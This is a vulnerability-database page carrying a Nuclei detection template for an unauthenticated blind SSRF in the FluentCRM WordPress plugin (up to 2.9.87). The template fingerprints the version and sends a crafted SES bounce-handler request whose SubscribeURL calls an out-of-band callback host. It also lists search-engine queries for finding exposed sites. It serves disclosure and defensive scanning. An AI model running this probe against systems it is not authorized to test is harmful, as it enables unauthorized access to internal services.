Lucene search
K

WordPress FluentCRM <= 2.9.87 - Unauthenticated Blind SSRF

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

FluentCRM WordPress plugin <=2.9.87 allows unauthenticated blind SSRF through SubscribeURL; update to a newer version.

Related
Refs
Code
id: CVE-2026-7798

info:
  name: WordPress FluentCRM <= 2.9.87 - Unauthenticated Blind SSRF
  author: 0x_Akoko
  severity: medium
  description: |
    FluentCRM WordPress plugin <= 2.9.87 contains a blind server-side request forgery caused by improper validation of the 'SubscribeURL' parameter, letting unauthenticated attackers make arbitrary web requests, exploit requires unconfigured SES bounce handling key.
  impact: |
    Unauthenticated attackers can make arbitrary internal web requests, potentially querying or modifying internal service information.
  remediation: |
    Update to a version later than 2.9.87 or the latest available version.
  reference:
    - https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-7798
    - https://wordpress.org/plugins/fluent-crm/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2026-7798
    epss-score: 0.00645
    epss-percentile: 0.46435
    cwe-id: CWE-918
  metadata:
    verified: false
    max-request: 2
    publicwww-query: "wp-content/plugins/fluent-crm"
    fofa-query: body="fluent-crm"
    shodan-query: http.html:"fluent-crm"
  tags: cve,cve2026,wordpress,wp-plugin,fluentcrm,ssrf,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluent-crm/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "FluentCRM")'
          - 'compare_versions(version, "<= 2.9.87")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - '(?i)Stable tag:\s*([\w.]+)'
        group: 1
        internal: true

  - raw:
      - |
        POST /?fluentcrm=1&route=bounce_handler&provider=ses HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"Type":"SubscriptionConfirmation","SubscribeURL":"http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a00473045022100c558488a80d22e01a1ad9f48f45f36b5337147afbbd14b6480040f73ce0160eb02200de9342949a9e0d9a564b2970c80d3fee152e86714421d19dda9640dfbfd1b61:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 May 2026 01:50Current
6Medium risk
Vulners AI Score6
CVSS 3.15.4
EPSS0.00645
SSVC
14